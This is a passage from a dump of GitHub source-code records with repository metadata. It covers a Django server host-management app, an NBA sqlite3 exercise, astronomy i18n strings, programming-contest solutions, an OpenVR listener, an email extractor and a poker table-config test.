如果未登陆,跳转到指定页面\n if not request.session.get(\"name\"):\n # print(\"no login\")\n return redirect('/login')\n return func(request, *args, **kwargs)\n return wrap\n\n\n@lg\ndef index(request):\n # 首页\n uid = request.session.get(\"id\")\n name = request.session.get(\"name\")\n data = models.Host.objects.all()\n\n return render(request, \"index.html\", {\"host_list\": data, \"name\": name, })\n\n\nclass Host(forms.Form):\n id = fields.IntegerField(\n widget=widgets.Input(attrs={'class': 'form-control', 'placeholder': 'Name'}),\n required=True,\n )\n name = fields.CharField(\n widget=widgets.Input(attrs={'class': 'form-control', 'placeholder': 'Name'}),\n error_messages={\n 'required': '用户名不能为空',\n }\n )\n ip = fields.GenericIPAddressField(\n widget=widgets.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Password'}),\n error_messages={\n 'required': 'IP不能为空',\n }\n )\n port = fields.IntegerField(\n widget=widgets.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Password'}),\n error_messages={\n 'required': '端口不能为空',\n }\n )\n\n\ndef select_host(request):\n # 主机信息\n id = request.POST.get(\"id\")\n data = models.User.objects.filter(id=id).first()\n data_all = models.Host.objects.all()\n return HttpResponse({\"all\": data_all, \"my\": data})\n\n\ndef add_user(request):\n # 添加用户\n if request.method == \"GET\":\n obj = User()\n return render(request, \"adduser.html\", {\"obj\": obj})\n else:\n obj = User(request.POST)\n ret = obj.is_valid()\n if ret:\n models.User.objects.create(**obj.cleaned_data)\n return HttpResponse(\"ok\")\n else:\n return HttpResponse(\"err\")\n\n\nclass Permission(forms.Form):\n # print(models.User.objects.all().values_list(\"id\", \"name\"))\n user = fields.ChoiceField(\n initial=1,\n choices=models.User.objects.all().values_list(\"id\", \"name\"),\n widget=widgets.Select(attrs={'class': 'form-control', \"id\": \"u\"}),\n )\n s1 = fields.ChoiceField(\n widget=widgets.SelectMultiple(attrs={'class': 'form-control', \"id\": \"hosts\"}),\n )\n s2 = fields.ChoiceField(\n required=True,\n widget=widgets.SelectMultiple(attrs={'class': 'form-control', \"id\": \"all_hosts\"}),\n )\n\n def __init__(self, *args, **kwargs):\n super(Permission, self).__init__(*args, **kwargs)\n self.fields[\"user\"].choices = models.User.objects.all().values_list(\"id\", \"name\")\n\n\ndef permission(request):\n if request.method == \"GET\":\n obj = Permission()\n data1 = models.User.objects.all()\n return render(request, 
\"permission.html\", {\"user_list\": data1, \"obj\": obj})\n else:\n print(request.POST)\n a = {'user': [1], 's1': [1]}\n obj = Permission(a)\n ret = obj.is_valid()\n if ret:\n print('ok')\n else:\n print(obj.errors)\n\n\n\ndef host_group(request):\n return render(request, \"hostgroup.html\")\n\n\ndef get_hosts(request):\n if request.method == \"GET\":\n a_hosts = []\n a = int(request.GET.get(\"uid\"))\n # print(a, type(a))\n hosts = list(models.User.objects.filter(id=a).first().h.all().values_list(\"id\", \"ip\", \"name\"))\n all_host = list(models.Host.objects.all().values_list(\"id\", \"ip\", \"name\"))\n for i in all_host:\n if i not in hosts:\n a_hosts.append(i)\n # print(hosts, a_hosts)\n return HttpResponse(json.dumps({\"hosts\": hosts, \"all_hosts\": a_hosts}))\n # else:\n # print(\"eee\")\n # hosts = [] # 有权限的主机列表\n # all_hosts = [] # 没有权限的主机列表\n # uid = request.POST.get(\"uid\")\n # print(uid)\n # data = models.User.objects.filter(id=uid).first().h.all()\n # all_host = models.Host.objects.all()\n # for i in data:\n # temp = [i.id, i.ip, i.name]\n # hosts.append(temp)\n # for i in all_host:\n # temp = [i.id, i.ip, i.name]\n # if temp in hosts:\n # continue\n # all_hosts.append(temp)\n #\n # return HttpResponse(json.dumps({\"hosts\": hosts, \"all_hosts\": all_hosts}))\n # return HttpResponse(data)\n\n\nclass Login(forms.Form):\n # 字段本身只能验证,内含插件生成html\n name = fields.CharField(\n widget=widgets.Input(attrs={'class': 'form-control', 'placeholder': 'Name'}),\n max_length=20,\n error_messages={\n 'required': '用户名不能为空',\n 'min_length': '最小长度为6',\n }\n )\n pwd = fields.CharField(\n widget=widgets.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Password'}),\n error_messages={\n 'required': '密码不能为空',\n }\n )\n\n\ndef login(request):\n # 登录\n if request.method == \"GET\":\n obj = Login()\n return render(request, 'login.html', {\"obj\": obj})\n else:\n obj = Login(request.POST)\n ret = obj.is_valid() # 验证输入是否合格\n if ret:\n print(obj.cleaned_data) # 打印用户输入数据\n data = models.User.objects.filter(**obj.cleaned_data).first()\n if data:\n request.session[\"auth\"] = data.ugrup\n request.session[\"name\"] = data.name\n request.session[\"id\"] = data.id\n return redirect(\"/index\")\n else:\n return render(request, 'login.html', {\"obj\": obj, \"status\": \"用户名或密码错误\"})\n else:\n print(obj.errors)\n return render(request, 'login.html', {\"obj\": obj})\n\n\ndef add_host(request):\n server_name = request.POST.get(\"name\")\n ip = request.POST.get(\"ip\")\n port = request.POST.get(\"port\")\n user = request.POST.get(\"user\")\n print(server_name, ip, port, user)\n obj = models.Host(name=server_name, ip=ip, port=port, user=user)\n a = obj.save()\n print(a)\n return redirect(\"/index\")\n\n\ndef host_info(request):\n data = models.Host.objects.filter(id=request.POST.get('id')).first()\n send_data = {\"id\": data.id, \"name\": data.name, \"ip\": data.ip, \"port\": data.port, \"user\": data.users}\n return HttpResponse(json.dumps(send_data))\n\n\ndef host_del(request):\n models.Host.objects.filter(id=request.POST.get('id')).first().delete()\n return HttpResponse(json.dumps({\"status\": \"ok\"}))\n\n\ndef host_edit(request):\n id = request.POST.get(\"id\")\n name = request.POST.get(\"name\")\n ip = request.POST.get(\"ip\")\n port = request.POST.get(\"port\")\n obj = models.Host.objects.filter(id=id).first()\n obj.name = name\n obj.ip = ip\n obj.port = port\n obj.save()\n return HttpResponse(\"ok\")\n\n\ndef login_off(request):\n request.session.delete()\n return redirect(\"/login\")\n\n\nclass 
fm(forms.Form):\n user = forms.CharField()\n pwd = forms.CharField()\n email = forms.EmailField()\n\n\ndef test(request):\n if request.method == \"GET\":\n return render(request, \"test.html\")\n else:\n dd = request.POST.get(\"dd\")\n print(dd, type(dd))\n a = json.loads(dd)\n print(a, type(a))\n return HttpResponse(\"ok\")\n","repo_name":"topsai/day17","sub_path":"hostmanager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28878198061","text":"\"\"\"Bite 195. Analyze NBA Data with sqlite3.\"\"\"\n# pylint: disable=unused-argument,too-many-locals,too-many-arguments\n\nimport csv\nimport os\nimport random\nimport sqlite3\nimport string\nfrom collections import Counter, namedtuple\nfrom pathlib import Path\nfrom statistics import mean\n\nimport requests\n\nDATA_URL = \"https://query.data.world/s/ezwk64ej624qyverrw6x7od7co7ftm\"\nTMP = Path(os.getenv(\"TMP\", \"/tmp\"))\n\nSALT = \"\".join(random.choice(string.ascii_lowercase) for i in range(20))\nDB = TMP / f\"nba_{SALT}.db\"\n\nPlayer = namedtuple(\n \"Player\", (\"name year first_year team college active \" \"games avg_min avg_points\")\n)\n\nconn = sqlite3.connect(DB)\ncur = conn.cursor()\n\n\ndef import_data() -> None:\n \"\"\"Pull down CSV data, convert to sqlite3 database.\"\"\"\n with requests.Session() as session:\n content = session.get(DATA_URL).content.decode(\"utf-8\")\n\n reader = csv.DictReader(content.splitlines(), delimiter=\",\")\n\n players = []\n for row in reader:\n players.append(\n Player(\n name=row[\"Player\"],\n year=row[\"Draft_Yr\"],\n first_year=row[\"first_year\"],\n team=row[\"Team\"],\n college=row[\"College\"],\n active=row[\"Yrs\"],\n games=row[\"Games\"],\n avg_min=row[\"Minutes.per.Game\"],\n avg_points=row[\"Points.per.Game\"],\n )\n )\n\n cur.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS players\n (name, year, first_year, team, college, active,\n games, avg_min, avg_points)\"\"\"\n )\n cur.executemany(\"INSERT INTO players VALUES (?,?,?,?,?,?,?,?,?)\", players)\n conn.commit()\n\n\nimport_data()\n\n\ndef query(\n name=None,\n year=None,\n first_year=None,\n team=None,\n college=None,\n active=None,\n games=None,\n avg_min=None,\n avg_points=None,\n operator=\"LIKE\",\n fields=\"*\",\n):\n \"\"\"Query the sqlite db.\"\"\"\n argv = locals()\n del argv[\"operator\"]\n del argv[\"fields\"]\n\n sql = f\"SELECT {fields} FROM players\"\n params = []\n for key, value in argv.items():\n if value is not None:\n sql += f\" WHERE {key} {operator} ?\"\n params.append(value)\n cur.execute(sql, params)\n return cur.fetchall()\n\n\ndef player_with_max_points_per_game() -> str:\n \"\"\"The player with highest average points per game.\n\n (don't forget to CAST to numeric in your SQL query)\n \"\"\"\n most_ave_points = query(fields=\"name, MAX(CAST(avg_points AS REAL))\")\n return most_ave_points.pop()[0]\n\n\ndef number_of_players_from_duke() -> int:\n \"\"\"Return the number of players with college == Duke University.\"\"\"\n duke_players = query(college=\"Duke University\")\n return len(duke_players)\n\n\ndef avg_years_active_players_stanford() -> float:\n \"\"\"Return average years players from Stanford University are active.\n\n (\"active\" column) Round to two digits.\n \"\"\"\n active_years = query(fields=\"active\", college=\"Stanford University\")\n active_years = [int(entry[0]) for entry in active_years]\n ave_active_years = mean(active_years)\n return round(ave_active_years, 2)\n\n\ndef year_with_most_new_players() -> int:\n \"\"\"Return the year with the most new players.\n\n Hint: you can use GROUP BY on the year column.\n \"\"\"\n sql = \"SELECT year, COUNT(*) FROM players GROUP BY year\"\n cur.execute(sql)\n new_per_year: Counter = Counter()\n for year, count in cur.fetchall():\n new_per_year[int(year)] = count\n return 
new_per_year.most_common(1).pop()[0]\n","repo_name":"jsh/pybites","sub_path":"195/nba.py","file_name":"nba.py","file_ext":"py","file_size_in_byte":3532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"18735195291","text":"#!/usr/bin/env python3\n\nfrom typing import Union\nfrom .utils import _\n\nfrom kosmorrolib import EventType, MoonPhaseType, ObjectIdentifier, Event\n\n\ndef from_event(event: Event, with_description: bool = True) -> Union[None, str]:\n string, details = {\n EventType.OPPOSITION: (_(\"%s is in opposition\"), None),\n EventType.CONJUNCTION: (_(\"%s and %s are in conjunction\"), None),\n EventType.OCCULTATION: (_(\"%s occults %s\"), None),\n EventType.MAXIMAL_ELONGATION: (\n _(\"Elongation of %s is maximal\"),\n lambda e: \"{:.3n}°\".format(e.details[\"deg\"]),\n ),\n EventType.PERIGEE: (_(\"%s is at its periapsis\"), None),\n EventType.APOGEE: (_(\"%s is at its apoapsis\"), None),\n }.get(event.event_type, (None, None))\n\n if string is None:\n return None\n\n string = string % tuple([from_object(o.identifier) for o in event.objects])\n\n if details is not None and with_description:\n return \"%s (%s)\" % (string, details(event))\n\n return string\n\n\ndef from_moon_phase(moon_phase: MoonPhaseType) -> str:\n string = {\n MoonPhaseType.NEW_MOON: _(\"New Moon\"),\n MoonPhaseType.WAXING_CRESCENT: _(\"Waxing Crescent\"),\n MoonPhaseType.FIRST_QUARTER: _(\"First Quarter\"),\n MoonPhaseType.WAXING_GIBBOUS: _(\"Waxing Gibbous\"),\n MoonPhaseType.FULL_MOON: _(\"Full Moon\"),\n MoonPhaseType.WANING_GIBBOUS: _(\"Waning Gibbous\"),\n MoonPhaseType.LAST_QUARTER: _(\"Last Quarter\"),\n MoonPhaseType.WANING_CRESCENT: _(\"Waning Crescent\"),\n }.get(moon_phase)\n\n if string is None:\n raise RuntimeError(\"Unknown moon phase: %s.\" % moon_phase)\n\n return string\n\n\ndef from_object(identifier: ObjectIdentifier) -> str:\n return {\n ObjectIdentifier.SUN: _(\"Sun\"),\n ObjectIdentifier.MOON: _(\"Moon\"),\n ObjectIdentifier.MERCURY: _(\"Mercury\"),\n ObjectIdentifier.VENUS: _(\"Venus\"),\n ObjectIdentifier.EARTH: _(\"Earth\"),\n ObjectIdentifier.MARS: _(\"Mars\"),\n ObjectIdentifier.JUPITER: _(\"Jupiter\"),\n ObjectIdentifier.SATURN: _(\"Saturn\"),\n ObjectIdentifier.URANUS: _(\"Uranus\"),\n ObjectIdentifier.NEPTUNE: _(\"Neptune\"),\n ObjectIdentifier.PLUTO: _(\"Pluto\"),\n }.get(identifier)\n","repo_name":"Kosmorro/kosmorro","sub_path":"kosmorro/i18n/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"61"}
+{"seq_id":"23588235051","text":"import operator\r\n\r\nt = int(input())\r\n\r\nfor case_num in range(t):\r\n\tline = [int(x) for x in input().split(' ')]\r\n\tn = int(line[0])\r\n\tk = int(line[1])\r\n\tu = float(input())\r\n\tp = [float(x) for x in input().split(' ')]\r\n\tp.sort()\r\n\twhile u > 0:\r\n\t\ts0 = p[0]\r\n\t\ts1 = [(x, i) for i, x in enumerate(p) if x > s0]\r\n\t\tif len(s1) > 0:\r\n\t\t\tidx = s1[0][1]\r\n\t\t\ts1 = s1[0][0]\r\n\t\t\tif u >= (s1 - s0) * idx:\r\n\t\t\t\tfor i in range(idx):\r\n\t\t\t\t\tp[i] += s1 - s0\r\n\t\t\t\tu -= (s1 - s0) * idx\r\n\t\t\telse:\r\n\t\t\t\tfor i in range(idx):\r\n\t\t\t\t\tp[i] += u / idx\r\n\t\t\t\tu = 0\r\n\t\telse:\r\n\t\t\tp = [x + u / n for x in p]\r\n\t\t\tu = 0\r\n\tans = 1\r\n\tfor x in p:\r\n\t\tans *= x\r\n\tprint('Case #%d: %.8f' % (case_num + 1, ans))\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_211/186.py","file_name":"186.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23415590851","text":"import sys\r\n\r\ninfile = open('A-small-attempt0.in','r')\r\noutfile = open('A-small-attempt0.out','w')\r\n\r\nt = int(infile.readline())\r\nfor case in range(1,t+1):\r\n first_selection = int(infile.readline())\r\n first_layout = []\r\n first_layout.append([int(x) for x in infile.readline().split()])\r\n first_layout.append([int(x) for x in infile.readline().split()])\r\n first_layout.append([int(x) for x in infile.readline().split()])\r\n first_layout.append([int(x) for x in infile.readline().split()])\r\n first_row = first_layout[first_selection - 1]\r\n\r\n second_selection = int(infile.readline())\r\n second_layout = []\r\n second_layout.append([int(x) for x in infile.readline().split()])\r\n second_layout.append([int(x) for x in infile.readline().split()])\r\n second_layout.append([int(x) for x in infile.readline().split()])\r\n second_layout.append([int(x) for x in infile.readline().split()])\r\n second_row = second_layout[second_selection - 1]\r\n\r\n matches = []\r\n for first in first_row:\r\n for second in second_row:\r\n if first == second:\r\n matches.append(first)\r\n\r\n outline = 'Case #' + str(case) + ': '\r\n if len(matches) == 1:\r\n outline += str(matches[0]) + '\\n'\r\n elif len(matches) > 1:\r\n outline += 'Bad magician!' + '\\n'\r\n else:\r\n outline += 'Volunteer cheated!' + '\\n'\r\n outfile.write(outline)\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/3048.py","file_name":"3048.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23587987571","text":"#!/usr/bin/env python3\nimport math, collections, itertools\nfrom sys import stdin\n\n\ndef readValue(valueType):\n return valueType(stdin.readline())\n\n\ndef readValues(valueType):\n return list(map(valueType, stdin.readline().split()))\n\n\nclass Mouth():\n count = 1\n\n @classmethod\n def answer(cls, answer):\n print(\"Case #{}: {}\".format(cls.count, answer))\n cls.count += 1\n\n\ndef readInput():\n N, K = readValues(int)\n U = readValue(float)\n\n probs = readValues(float)\n\n return N, K, U, probs\n\n\ndef solve(N, K, U, probs):\n EPS = 0.000000000000001\n best = 0\n l, r = 0, 1\n while r - l > EPS:\n mid = (l + r) / 2\n\n needed = 0\n totalProb = 1\n for prob in probs:\n if prob < mid:\n needed += mid - prob\n totalProb *= mid\n else:\n totalProb *= prob\n\n if needed <= U:\n l = mid + EPS\n best = max(best, totalProb)\n else:\n r = mid - EPS\n\n return best\n\n\nif __name__ == '__main__':\n for _ in range(readValue(int)):\n Mouth.answer(solve(*readInput()))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_211/102.py","file_name":"102.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23563887861","text":"import sys\r\n#sys.stdin = open('input.in','r')\r\n#sys.stdout = open('output.in','w')\r\nt=int(input())\r\ntest = 0\r\nwhile testord(n[i])):\r\n n[i]='9'\r\n j=i-1\r\n if(f==False):\r\n n[j]=chr(ord(n[j])-1)\r\n f=True\r\n while(j>0 and ord(n[j]) total:\n print(f\"The budget for the movie is enough! We have {diff:.2f} leva left!\")\nelse:\n print(f\"The director needs {diff:.2f} leva more!\")\n","repo_name":"Dimitrov-S-Dev-Python/SoftUni_Python_Basics","sub_path":"Exams_Tasks/PB_15_06_2019/Movie_Destination.py","file_name":"Movie_Destination.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1898746102","text":"import triad_openvr\nimport time\n\nfrom PyQt5 import QtCore\n\n\nclass ListenerWorker(QtCore.QObject):\n obtained_sample = QtCore.pyqtSignal(str)\n finished = QtCore.pyqtSignal()\n\n def __init__(self, parent=None):\n QtCore.QObject.__init__(self, parent)\n\n self.interval = 1/250\n\n self.vr = None\n self.active = True\n\n def start(self):\n print(\"Starting Listener Thread\")\n\n # self.vr = triad_openvr.triad_openvr()\n\n self.main_loop()\n self.finished.emit()\n\n def main_loop(self):\n i = 0\n while self.active:\n start_time = time.time()\n\n i += 1\n # self.obtained_sample.emit(\"%s %s\" % (start_time, i))\n\n sleep_time = self.interval - (time.time() - start_time)\n if sleep_time > 0:\n # QtCore.QThread.msleep(int(sleep_time*1000))\n time.sleep(sleep_time)\n print(i)\n\n def close(self):\n # self.vr.close_triad()\n\n self.active = False\n print(\"Active CLOSED: %s\" % self.active)\n\n\nif __name__ == '__main__':\n # interval = 1/refresh_rate\n #\n # v = vr.triad_openvr()\n # v.print_discovered_objects()\n #\n # while True:\n # start = time.time()\n # text = \"\"\n # for pose in v.devices[device_name].get_pose_euler():\n # text += \"%s.4f\" % pose\n # text += \" \"\n # print(\"\\r\" + text, end=\"\")\n # sleep_time = interval-(time.time()-start)\n # if sleep_time > 0:\n # time.sleep(sleep_time)\n pass\n","repo_name":"JaydenB/OpenVR-Recorder","sub_path":"openvr.py","file_name":"openvr.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"1018470558","text":"from django.db import models\nfrom django.utils.translation import ugettext as _\nfrom Lunchbreak.exceptions import LunchbreakException\nfrom Lunchbreak.mixins import CleanModelMixin\n\nfrom ..managers import OrderManager\nfrom .ordered_food import OrderedFood\n\n\nclass AbstractOrder(CleanModelMixin, models.Model):\n\n class Meta:\n abstract = True\n\n def __str__(self):\n return _('%(user)s, %(store)s (onbevestigd)') % {\n 'user': self.user.name,\n 'store': self.store\n }\n\n objects = OrderManager()\n\n user = models.ForeignKey(\n 'User',\n on_delete=models.CASCADE,\n verbose_name=_('gebruiker'),\n help_text=_('Gebruiker.')\n )\n store = models.ForeignKey(\n 'lunch.Store',\n on_delete=models.CASCADE,\n verbose_name=_('winkel'),\n help_text=_('Winkel.')\n )\n\n @classmethod\n def is_valid(cls, orderedfood, **kwargs):\n if orderedfood is None or len(orderedfood) == 0:\n raise LunchbreakException(\n 'Een bestelling moet etenswaren hebben.'\n )\n\n try:\n for f in orderedfood:\n if not isinstance(f, dict) and not isinstance(f, OrderedFood):\n raise ValueError(\n 'Order creation requires a list of dicts or OrderedFoods.'\n )\n except TypeError:\n raise LunchbreakException(\n 'Een bestelling moet etenswaren hebben.'\n )\n","repo_name":"ssprasad100/Lunchbreak_backend_again","sub_path":"lunchbreak/customers/models/abstract_order.py","file_name":"abstract_order.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"6510896354","text":"from __future__ import division\nimport os\nimport re\nimport sys\nimport urllib\n\ndef getEmailListStrVersion(sourceFile):\n allEmails,setEmails=getTheEmails(sourceFile)\n emStr=\"\\n\".join(allEmails)\n return emStr\n\ndef getTheEmails(sourceFile):\n emailPattern=r'[\\w\\.-]+@[\\w\\.-]+'\n f=open(sourceFile,'r')\n allLines=f.read()\n f.close()\n allMatchedEmails=re.findall(emailPattern,allLines)\n return allMatchedEmails,list(set(allMatchedEmails))\n\ndef emailsWeightImportance(allEmailLists,setEmailList):\n emailsWeight={}\n for email in setEmailList:\n emailsWeight[email]=[allEmailLists.count(email),round(allEmailLists.count(email)/len(allEmailLists),2)]\n return emailsWeight\n\ndef domainSplitting(setEmails):\n domainList=[]\n for email in setEmails:\n splitAddress = email.split('@')\n domain = str(splitAddress[1])\n #print (domain)\n domainList.append(domain)\n domainList=list(set(domainList))\n domainStr=\"\\n\".join(domainList)\n return domainStr,domainList\n","repo_name":"jahidul-arafat/JALPA-log-forensics-Python-Toolkit","sub_path":"source/emailManupulator.py","file_name":"emailManupulator.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16353705955","text":"# 21921 - 블로그 (실버3) \n# 슬라이딩윈도우 알고리즘\nfrom sys import stdin as s\n#제출 시 주석 필수\ns=open(\"input.txt\",\"rt\")\n\n[n, window_size] = list(map(int, s.readline().split(' ')));\ninput_arr =list(map(int, s.readline().split(' ')));\n\nsum_arr=[];\nfirst_sum =0;\nfor i in range(0,window_size):\n first_sum+=input_arr[i];\nsum_arr.append(first_sum);\n\n#교집합이 생기므로 슬라이딩 윈도우 사용하여 효율성 높이기\ni=0;\nstart=0;\nend=start+window_size;\nwhile(1):\n if (end == n): break;\n sum = sum_arr[i] - input_arr[start]+ input_arr[end];\n sum_arr.append(sum);\n i+=1;\n start+=1;\n end=start+window_size;\n\n#최대 방문자 수 및 개수 구하기\nmax_cnt = max(sum_arr);\nif (max_cnt == 0): print('SAD');\nelse: \n print(max_cnt);\n print(sum_arr.count(max_cnt))\n\n ","repo_name":"Sae-byeol/algorithm_PY","sub_path":"implements/21921.py","file_name":"21921.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"5318236440","text":"import pygame as pg\nfrom settings import *\nimport random\nimport time\n\n\nclass Player(pg.sprite.Sprite):\n\tdef __init__(self, game, x, y, hp, prot, atk):\n\t\t#PYGAME\n\t\tself.groups = game.all_sprites\n\t\tpg.sprite.Sprite.__init__(self, self.groups)\n\t\tself.game = game\n\t\tself.image = pg.Surface((TILESIZE, TILESIZE))\n\t\tself.image.fill(GREEN)\n\t\tself.rect = self.image.get_rect()\n\t\tself.x = x\n\t\tself.y = y\n\n\t\t#Player attr\n\t\tself.hp = hp\n\t\tself.prot = prot\n\t\tself.hp_max = hp\n\t\tself.atk = atk\n\t\tself.armor = {'head': None, 'chest': None, 'legs': None, 'feet': None}\n\t\tself.weapon = None\n\t\tself.p_coins = 0\n\t\t\n\n\tdef move(self, dx=0, dy=0):\n\t\tif self.game.inventory.display_inventory != True:\n\t\t\tself.x += dx\n\t\t\tself.y += dy\n\t\t\tself.check_collision()\n\n\tdef addHp(self, hp_gain):\n\t\tself.hp += hp_gain\n\t\tif self.hp > self.hp_max:\n\t\t\tself.hp = self.hp_max\n\n\tdef addProt(self, prot_gain):\n\t\tself.prot += prot_gain\n\n\tdef equip_armor(self, item):\n\t\tif self.armor[item.slot] != None:\n\t\t\tself.unequip_armor(item.slot)\n\t\tself.armor[item.slot] = item\n\t\tself.prot += item.prot\n\n\tdef unequip_armor(self, slot):\n\t\tif self.armor[slot] != None:\n\t\t\tself.prot -= self.armor[slot].prot\n\t\t\tself.armor[slot] = None\n\n\tdef equip_weapon(self, weapon):\n\t\tif self.weapon != None:\n\t\t\tself.unequip_weapon()\n\t\tself.weapon = weapon\n\t\tself.atk += weapon.atk\n\n\tdef unequip_weapon(self):\n\t\tif self.weapon != None:\n\t\t\tself.atk -= self.weapon.atk\n\t\t\tself.weapon = None\n\n\tdef check_collision(self):\n\t\tself.check_coin()\n\n\tdef check_coin(self):\n\t\tif self.x == self.game.coin.x and self.y == self.game.coin.y:\n\t\t\tself.add_coin()\n\t\t\tself.game.new_coin()\n\n\tdef add_coin(self):\n\t\tself.p_coins += 10\n\n\tdef update(self):\n\t\tself.rect.x = self.x * TILESIZE\n\t\tself.rect.y = self.y * TILESIZE\n\n\nclass Coin(pg.sprite.Sprite):\n\tdef __init__(self, game, x, y):\n\t\tself.groups = game.all_sprites, game.all_coins\n\t\tpg.sprite.Sprite.__init__(self, self.groups)\n\t\tself.game = game\n\t\tself.image = pg.image.load('img/coin.png').convert_alpha()\n\t\tself.rect = self.image.get_rect()\n\t\tself.x = x\n\t\tself.y = y\n\n\tdef update(self):\n\t\tself.rect.x = self.x * TILESIZE+COINOFFSET\n\t\tself.rect.y = self.y * TILESIZE+COINOFFSET","repo_name":"AlvarMarkhester/pg-inventory-system","sub_path":"sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"23604130261","text":"fin = open('E:\\\\cj\\\\B-large.in', 'r')\r\nlines = fin.readlines()\r\nfin.close()\r\n\r\nfout = open('E:\\\\cj\\\\b.out', 'w')\r\n\r\ndef gcd(a, b):\r\n while b > 0:\r\n a, b = b, a % b\r\n return a\r\n\r\ncase = 0\r\ncases = int(lines[0])\r\nlp = 1\r\nfor case in xrange(1, cases + 1):\r\n l = lines[lp]\r\n X = [int(x) for x in l.split()]\r\n N = X[0]\r\n t = X[1:]\r\n\r\n gisa = abs(t[0] - t[1])\r\n\r\n for i in xrange(0, N):\r\n for j in xrange(i + 1, N):\r\n diff = abs(t[i] - t[j])\r\n gisa = gcd(max(gisa, diff), min(gisa, diff))\r\n\r\n fout.write('Case #%d: %s\\n' % (case, (gisa - (t[0] % gisa))%gisa))\r\n lp += 1\r\n\r\nfout.close()\r\n \r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_54/63.py","file_name":"63.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23133154180","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport os\nimport tempfile\nimport unittest\n\nfrom pokernetwork import tableconfigutils\n\n\nSERVER_CONFIG_TEMPLATE = \"\"\"\\\n\n\n%s\n \"\"\"\n\n\nTABLE_CONFIG_TEMPLATE = \"\"\"\\\n\n\n%s\n \"\"\"\n\n\nTABLE_NODE_TEMPLATE = \"\"\"\\\n\"\"\"\n\n\nSERVER_CONFIG_TABLES = [\n ('One', 'holdem', '5-10-no-limit'),\n ('Two', 'omaha', '2-4-limit'),\n ('Four', 'omaha8', '.01-.02-pot-limit'),\n ('Ten', 'stud', '10-20-limit'),\n ('Eleven', 'stud', '30-60-limit')\n]\n\n\nTABLE_CONFIGS = {\n 'holdem.limit.xml': [('One', 'holdem', '2-4-limit'),\n ('Two', 'holdem', '10-20-limit')],\n 'holdem.no-limit.xml': [('Three', 'holdem', '.02-.04-no-limit'),\n ('Four', 'holdem', '.05-.10-no-limit', '6'),\n ('Five', 'holdem', '100-200-no-limit')],\n 'omaha.limit.xml': [('Six', 'omaha', '2-4-limit'),\n ('Seven', 'omaha', '10-20-limit', '8')],\n 'omaha8.limit.xml': [('Eight', 'omaha8', '20-40-limit'),\n ('Nine', 'omaha8', '5-10-limit')]\n}\n\n\n# result of merging SERVER_CONFIG_TABLES with tables in TABLE_CONFIGS\nMERGED_TABLES = [\n ('One', 'holdem', '2-4-limit'),\n ('Two', 'holdem', '10-20-limit'),\n ('Three', 'holdem', '.02-.04-no-limit'),\n ('Four', 'holdem', '.05-.10-no-limit', '6'),\n ('Five', 'holdem', '100-200-no-limit'),\n ('Six', 'omaha', '2-4-limit'),\n ('Seven', 'omaha', '10-20-limit', '8'),\n ('Eight', 'omaha8', '20-40-limit'),\n ('Nine', 'omaha8', '5-10-limit'),\n ('Ten', 'stud', '10-20-limit'),\n ('Eleven', 'stud', '30-60-limit')\n]\n\n\ndef create_table_dict(name, variant, betting_structure, seats='10'):\n return {'name': name, 'variant': variant,\n 'betting_structure': betting_structure, 'seats': seats}\n\n\ndef create_table_xml_entry(table_properties):\n return TABLE_NODE_TEMPLATE % table_properties\n\n\ndef create_config(config_template, tables):\n table_xml_entries = []\n for table in tables:\n table_properties = create_table_dict(*table)\n table_xml_entries.append(create_table_xml_entry(table_properties))\n return config_template % '\\n'.join(table_xml_entries)\n\n\nclass DummyServerConfig():\n def __init__(self, table_descriptions,\n table_node_xpath=tableconfigutils.DEFAULT_TABLE_NODE_XPATH):\n self.path = None\n self.table_descriptions = table_descriptions\n self.table_node_xpath = table_node_xpath\n\n def reload(self):\n pass\n\n def headerGetProperties(self, name):\n if name is self.table_node_xpath:\n return self.table_descriptions\n return []\n\n\nclass TableConfigUtilsTests(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.config_basedir = tempfile.mkdtemp()\n cls.server_config_path = os.path.join(cls.config_basedir,\n 'poker.server.xml')\n with 